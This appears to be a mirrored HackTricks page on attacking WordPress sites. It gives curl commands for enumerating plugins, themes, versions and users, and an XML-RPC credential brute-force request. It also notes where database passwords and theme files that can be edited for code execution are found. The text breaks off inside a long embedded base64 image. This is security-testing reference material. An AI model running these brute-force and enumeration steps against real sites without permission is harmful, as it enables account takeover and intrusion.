mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-04 02:20:20 +00:00
325 lines
49 KiB
Markdown
325 lines
49 KiB
Markdown
# Wordpress
|
|
|
|
## Basic Information
|
|
|
|
**Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_
|
|
**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: ****Using **theme twentytwelve** you can **access** the **404.php** file in**:** [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
|
|
**Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\*\*\*\*
|
|
|
|
In **wp-config.php** you can find the root password of the database.
|
|
|
|
Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
|
|
|
|
### **Main WordPress Files**
|
|
|
|
* `index.php`
|
|
* `license.txt` contains useful information such as the version WordPress installed.
|
|
* `wp-activate.php` is used for the email activation process when setting up a new WordPress site.
|
|
* Login folders \(may be renamed to hide it\):
|
|
* `/wp-admin/login.php`
|
|
* `/wp-admin/wp-login.php`
|
|
* `/login.php`
|
|
* `/wp-login.php`
|
|
* `xmlrpc.php` is a file that represents a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
|
|
* The `wp-content` folder is the main directory where plugins and themes are stored.
|
|
* `wp-content/uploads/` Is the directory where any files uploaded to the platform are stored.
|
|
* `wp-includes/` This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
|
|
|
|
#### Post exploitation
|
|
|
|
* The `wp-config.php` file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
|
|
|
|
### Users Permissions
|
|
|
|
* **Administrator**
|
|
* **Editor**: Publish and manages his and others posts
|
|
* **Author**: Publish and manage his own posts
|
|
* **Contributor**: Write and manage his posts but cannot publish them
|
|
* **Subscriber**: Browser posts and edit their profile
|
|
|
|
## **Passive Enumeration**
|
|
|
|
### **Get WordPress version**
|
|
|
|
Check if you can find the files `/license.txt` or `/readme.html`
|
|
|
|
Inside the **source code** of the page \(example from [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)\):
|
|
|
|
* `meta name`
|
|
|
|
![](../../.gitbook/assets/image%20%28379%29.png)
|
|
|
|
* CSS link files
|
|
|
|
![](../../.gitbook/assets/image%20%28377%29.png)
|
|
|
|
* JavaScript files
|
|
|
|
![](../../.gitbook/assets/image%20%28376%29.png)
|
|
|
|
### Get Plugins
|
|
|
|
```bash
|
|
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
|
```
|
|
|
|
### Get Themes
|
|
|
|
```bash
|
|
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
|
```
|
|
|
|
### Extract versions in general
|
|
|
|
```bash
|
|
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
|
|
```
|
|
|
|
## Active enumeration
|
|
|
|
### Plugins and Themes
|
|
|
|
You probably won't be able to find all the Plugins and Themes passible. In order to discover all of them, you will need to **actively Brute Force a list of Plugins and Themes** \(hopefully for us there are automated tools that contains this lists\).
|
|
|
|
### Users
|
|
|
|
#### ID Brute
|
|
|
|
You get valid users from a WordPress site by Brute Forcing users IDs:
|
|
|
|
```text
|
|
curl -s -I -X GET http://blog.example.com/?author=1
|
|
```
|
|
|
|
If the responses are **200** or **30X**, that means that the id is **valid**. If the the response is **400**, then the id is **invalid**.
|
|
|
|
#### wp-json
|
|
|
|
You can also try to get information about the users by querying:
|
|
|
|
```text
|
|
curl http://blog.example.com/wp-json/wp/v2/users
|
|
```
|
|
|
|
**Only information about the users that has this feature enable will be provided**.
|
|
|
|
Also note that _**/wp-json/wp/v2/pages** could leak IP addresses**.**_
|
|
|
|
### XML-RPC
|
|
|
|
If `xml-rpc.php` is active you can perform a credentials brute-force or use it to launch DoS attacks to other resources.
|
|
|
|
To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
|
|
|
|
#### Check
|
|
|
|
```markup
|
|
<methodCall>
|
|
<methodName>system.listMethods</methodName>
|
|
<params></params>
|
|
</methodCall>
|
|
```
|
|
|
|
![](https://h3llwings.files.wordpress.com/2019/01/list-of-functions.png?w=656)
|
|
|
|
#### Credentials Bruteforce
|
|
|
|
_**wp.getUserBlogs**_, _**wp.getCategories**_ or _**metaWeblog.getUsersBlogs**_ are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:
|
|
|
|
```markup
|
|
<methodCall>
|
|
<methodName>wp.getUsersBlogs</methodName>
|
|
<params>
|
|
<param><value>admin</value></param>
|
|
<param><value>pass</value></param>
|
|
</params>
|
|
</methodCall>
|
|
```
|
|
|
|
The message _"Incorrect username or password"_ inside a 200 code response should appear if the credentials aren't valid.
|
|
|
|
Also there is a **faster way** to brute-force credentials using **`system.multicall`** as you can try several credentials on the same request:
|
|
|
|
![](data:image/jpeg;base64,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